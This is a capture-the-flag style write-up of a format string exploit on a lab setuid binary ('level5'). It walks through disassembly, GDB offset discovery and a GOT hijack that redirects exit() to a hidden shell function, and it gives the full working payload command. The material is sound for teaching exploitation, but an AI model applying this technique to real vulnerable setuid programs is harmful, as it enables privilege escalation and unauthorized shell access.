# Level5 - Exam Notes

## 1. Objective
Get a level6 shell. The binary is setuid level6; function `o()` runs `system("/bin/sh")` but is never called. After `printf(buffer)`, the program calls `exit(1)`.

## 2. Copy the binary (extraction)
From the host, in the level directory:
```bash
scp -P 4242 level5@localhost:level5 ./level5.bin
```

## 3. Binary-to-source translation (source reconstruction)
- **Objdump / readelf:** `objdump -d level5.bin`, `readelf -s level5.bin` to locate `main`, `n`, `o`, calls to `printf`, `exit`, and addresses in .plt/.got.
- **Reconstructed logic:** `main` calls `n()`. In `n()`: 512-byte buffer, `fgets(buf, 512, stdin)`, then **printf(buf)** (no fixed format), then **exit(1)**. Function **o()** does `system("/bin/sh")` and is never called.
- **Where it can break:** user input is passed as the **first argument** to `printf` → controlled format string. We can use `%n` to write to memory. Logical target: make the `exit(1)` call go to **o()** instead of the real exit.
- Reconstructed source: `source.c` (see also `source.md`).

## 4. Understanding where it can break (vulnerability hypothesis)
- **Suspicious functions:** `printf(buffer)` in `n()` → format string. Right after: `exit(1)`.
- **Success:** run `o()` instead of `exit`. To do that, instead of overwriting a global variable, we can **overwrite the GOT entry for exit**: when `call exit@plt` runs, the CPU reads the address from the GOT; if we put **o**’s address there, the program jumps to `o()` → `system("/bin/sh")`.
- **Hypothesis:** format string to write the address of `o` at the address of the exit GOT. We need: (1) exit GOT address, (2) address of `o`, (3) the buffer **index** on the stack (to use `%k$n` where the k-th argument is our buffer containing the GOT address).

## 5. GDB diagnosis step-by-step

1. **Start GDB and load the binary**
   ```bash
   gdb -q ./level5.bin
   ```

2. **Locate functions and target**
   ```gdb
   info functions
   ```
   Note `n`, `o`, `exit`. Then:
   ```gdb
   disas n
   ```
   Example output (what it shows: buffer 0x218, fgets then printf(buffer) then exit):
   ```
   Dump of assembler code for function n:
      0x080484c2 <+0>:     push   %ebp
      ...
      0x080484f3 <+49>:    call   0x8048380 <printf@plt>
      0x080484f8 <+54>:    movl   $0x1,(%esp)
      0x080484ff <+61>:    call   0x80483d0 <exit@plt>
   ```
   Identify the call to `printf` and the call to `exit`. The exit GOT entry is used at that address.

   **Relocations (GOT/PLT):**
   ```bash
   readelf -r level5
   objdump -R level5
   ```
   Example: exit → 0x8049838 → **GOT exit = 0x8049838**.

   **Check GOT before exploit:**
   ```gdb
   x/x 0x8049838
   ```
   → `0x8049838 <exit@got.plt>: 0x080483d6` (normal PLT resolution).

3. **First run: find buffer index (dump)**
   Prepare a payload: first 4 bytes = "AAAA" (0x41414141), then format specifiers to print arguments.
   ```bash
   python -c 'print "AAAA" + "%1$p.%2$p.%3$p.%4$p.%5$p"' > /tmp/p
   ```
   In GDB:
   ```gdb
   run < /tmp/p
   ```
   Example output: `AAAA0x200.0xb7fd1ac0.0xb7ff37d0.0x41414141.0x70243125`

   ``bash
    AAAA
    0x200              -> residual value / 512
    0xb7fd1ac0         -> stdin (libc)
    0xb7ff37d0         -> libc address
    0x41414141         -> "AAAA"  buffer
    0x70243125         -> "%1$p"  
  ```
   → **0x41414141** appears at the 4th format: the 4th printf argument points to our buffer. We will use **%4$n** to write to the address contained in the buffer.

   **Format string reminder:**
   - `%k$p` = "print the k-th argument as pointer" (read).
   - `%k$n` = "write the number of bytes already printed to the address in the k-th argument" (write).
   We put **AAAA** (0x41×4) at the start of the buffer to easily recognize our buffer in the dump.

5. **Addresses for the exploit**
   - GOT exit: **0x8049838** (readelf -r or disassembly).
   - Function o:
     ```gdb
     p o
  ```
     Example: `$1 = {<text variable, no debug info>} 0x80484a4 <o>` → **0x080484a4**.
   - To write 0x080484a4 with a single `%n`, the number of bytes already printed must be 0x080484a4 = 134513828. The first 4 bytes of the buffer will be the GOT address (4 bytes) → we need to print **134513828 - 4 = 134513824** more characters, then `%4$n`.

## 6. Exploit design and command explanation

**Design:** We cannot "return" from n() because after printf there is exit(1). By modifying **the GOT entry for exit**, the next call to exit resolves to **o()** instead of libc. This is **GOT hijack**.

```bash
STACK:

[ ret ]
[ old ebp ]
[ arg1 = buffer ptr ]
[ arg2 ]
[ arg3 ]
[ arg4 → exit@got ]
```

```bash
*(int *)0x08049838 = 0x080484a4
```

```bash
exit@got = where to write
o        = what to write
%4$n     = write the address to the 4th argument
%134513824x = fabriquer la valeur 0x080484a4
```
**Final command (Exploitation section):**
```bash
( python -c 'print "\x38\x98\x04\x08" + "%134513824x%4$n"'; cat ) | ./level5
```

**Breakdown:**

- **Invocation:** `( python -c '...'; cat ) | ./level5`
  The program reads from stdin. `cat` keeps stdin open after the payload so we can type in the shell.

- **Part 1 — 4 bytes: exit GOT address (%n target)**
  - Address: **0x8049838**.
  - Little-endian: low byte first → 38, 98, 04, 08.
  - In Python: `\x38\x98\x04\x08`.
  - Role: these 4 bytes are at the start of the buffer; the 4th printf argument points to this buffer, so **%4$n** writes the number of bytes printed **at address 0x8049838** (GOT exit).

- **Part 2 — "%134513824x"**
  - Prints 134513824 characters (spaces + hex number) to define the value of count in printf.
  - Total printed before %4$n = 4 + 134513824 = **134513828** = 0x080484a4.
  - So %4$n writes **0x080484a4** (address of o) into the GOT.

- **Part 3 — "%4$n"**
  - Writes the number of bytes already printed (134513828) to the address in the 4th argument → 0x8049838.
  - Index 4 comes from GDB dump (AAAA + %k$p → 0x41414141 for k=4).

Summary: **\x38\x98\x04\x08** = GOT exit in LE; **%134513824x** = padding so total is 0x080484a4; **%4$n** = write to GOT. On the next `call exit`, the program runs o() → shell.

